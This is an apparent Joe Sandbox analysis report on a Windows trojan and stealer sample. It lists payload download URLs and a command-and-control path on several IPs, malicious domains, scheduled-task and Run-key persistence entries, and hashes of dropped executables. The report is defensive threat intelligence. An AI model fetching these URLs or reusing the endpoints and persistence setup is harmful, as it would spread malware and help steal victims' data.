http://31.41.244.11/files/martin/random.exe	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe0	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/steam/random.exeencoded	skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/ipbefore	53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe1	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.11/files/martin/random.exez	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe4c61395d7jm	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/well/random.exeP	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.11/files/kosodium/random.exew0Mo	skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php0j	skotes.exe, 00000005.00000002.3479841475.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://checkout.steampowered.com/	e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exe16496001	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/well/random.exeW	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wrathful-jammy.cyou/B	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/;	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz/apiG	e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/my/wishlist/	e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high
http://html4/loose.dtd	53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exe61coded	skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
98.85.100.80	httpbin.org	United States	11351	TWC-11351-NORTHEASTUS	false
104.21.2.110	sweepyribs.lat	United States	13335	CLOUDFLARENETUS	true
104.131.68.180	immureprech.biz	United States	14061	DIGITALOCEAN-ASNUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
178.62.201.34	deafeninggeh.biz	European Union	14061	DIGITALOCEAN-ASNUS	false
104.121.10.34	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
104.154.220.71	fivetk5pn.top	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
127.1.10.1	unknown	unknown	unknown	unknown	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576440
Start date and time:	2024-12-17 06:01:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@68/48@88/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 35.85.93.176, 44.228.225.150, 52.40.120.141, 172.217.21.35, 172.217.17.78, 64.233.163.84, 23.218.208.109, 142.250.181.142, 172.217.17.67, 172.217.19.10, 172.217.21.42, 172.217.19.170, 172.217.17.74, 172.217.19.202, 142.250.181.74, 172.217.17.42, 142.250.181.138, 142.250.181.10, 216.58.208.234, 172.217.19.234, 142.250.181.106, 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): shavar.prod.mozaws.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, detectportal.prod.mozaws.net, aus5.mozilla.org, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, location.services.mozilla.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:03:01	API Interceptor	820476x Sleep call for process: skotes.exe modified
00:03:14	API Interceptor	6x Sleep call for process: e66237da20.exe modified
00:03:35	API Interceptor	351x Sleep call for process: 53f7160658.exe modified
00:03:35	API Interceptor	12x Sleep call for process: powershell.exe modified
00:03:57	API Interceptor	7x Sleep call for process: a98b6b83c7.exe modified
00:04:16	API Interceptor	21x Sleep call for process: 53fe16f582.exe modified
06:02:04	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
06:03:31	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
06:04:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a98b6b83c7.exe C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe
06:04:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c3fed0b086.exe C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe
06:04:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a98b6b83c7.exe C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe
06:04:27	Task Scheduler	Run new task: 53f7160658 path: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe
06:04:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c3fed0b086.exe C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe
06:04:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 3f0b27a17c.exe C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe
06:04:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53f7160658.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	4TPPuMwzSA.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
98.85.100.80	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
98.85.100.80	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
104.21.2.110	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse
104.131.68.180	java.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
services.addons.mozilla.org	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	mdPov8VTwi.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	mdPov8VTwi.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	nmy4mJXEaz.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	6eftz6UKDm.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
example.org	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	93.184.215.14
	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	93.184.215.14
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
prod.detectportal.prod.cloudops.mozgcp.net	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	34.107.221.82
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.107.221.82
	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	fNlxQP0jBz.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	LbgqLv7gT7.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	34.107.221.82
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	34.107.221.82
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	P0HV8mjHS1.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
immureprech.biz	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.207.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.207.38
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	I37faEaz1K.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	YbJEkgZ4z5.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	3cb2b5U8BR.exe	Get hash	malicious	LummaC	Browse	172.67.207.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180
	PO DOC.html	Get hash	malicious	HTMLPhisher	Browse	164.90.188.192
	236236236.elf	Get hash	malicious	Unknown	Browse	138.68.116.54
	MDtEXRDJ3N.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	OmUg4Vt9Cg.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	mpsl.elf	Get hash	malicious	Mirai	Browse	174.138.36.14
	mips.elf	Get hash	malicious	Mirai	Browse	157.230.180.192
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	157.245.194.20
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	157.245.157.42
TWC-11351-NORTHEASTUS	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	98.85.100.80
	i486.elf	Get hash	malicious	Mirai	Browse	184.153.209.205
	ppc.elf	Get hash	malicious	Mirai	Browse	98.85.81.162
	i686.elf	Get hash	malicious	Mirai	Browse	66.66.33.30
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	76.179.142.49
	arm.elf	Get hash	malicious	Unknown	Browse	67.247.153.209
	ppc.elf	Get hash	malicious	Unknown	Browse	67.241.131.117
	powerpc.elf	Get hash	malicious	Unknown	Browse	172.100.72.92
	arm6.elf	Get hash	malicious	Unknown	Browse	68.175.192.233
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.206
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.16
	NYMPo215Qd.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	qvkwOs4JfC.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	185.215.113.206
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	172.67.129.27
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	https://tinyurl.com/5faazntx	Get hash	malicious	Unknown	Browse	104.18.111.161
	https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2d	Get hash	malicious	Unknown	Browse	104.21.16.207
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
	https://ivsmn.kidsavancados.com/	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://uvcr.ovactanag.ru/jQXv/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://bgf43.bookrecce.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	104.16.123.96
	https://tinyurl.com/cueen04fmfsf	Get hash	malicious	Unknown	Browse	172.67.204.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	wf1Ps82LYF.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	IMAKBWPY.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	JIKJCBEX.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	YTRNYRXC.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34
	fm2r286nqT.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.21.2.110 178.62.201.34 104.121.10.34

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, Vidar, Xmrig	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1763328
Entropy (8bit):	7.9328592774034865
Encrypted:	false
SSDEEP:	49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
MD5:	D37DAB4C59E707F632BB0B91EAA87FF9
SHA1:	0E153DEBCF54805A0543646620511B57865D6FC9
SHA-256:	375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
SHA-512:	0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970240
Entropy (8bit):	6.702656362349821
Encrypted:	false
SSDEEP:	24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8aFiUD:dTvC/MTQYxsWR7aF
MD5:	FA4DA1ACF28B53802C933C6AB5DB2C06
SHA1:	6DB997A98D70BB92F98EC33D717D3C56E44C571A
SHA-256:	3533C7C662100CBEDB01A5BAD319C7ED9CE6A47C4AB2E68BFAEE08DE7CA10F2C
SHA-512:	C5553F51F9ADB30E03F1D6D42BD7BF4538C3208082029BA18FF83C019F0DA4D47CBEDCEEF63796E37BDF6E41D5F8DE84B3EA277527477FF570E2BBE0B0AA7265
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...Y.ag..........".................w.............@..........................0......=]....@...@.......@.....................d...\|....@..Pb.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Pb...@...d..................@..@.reloc...u.......v...X..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
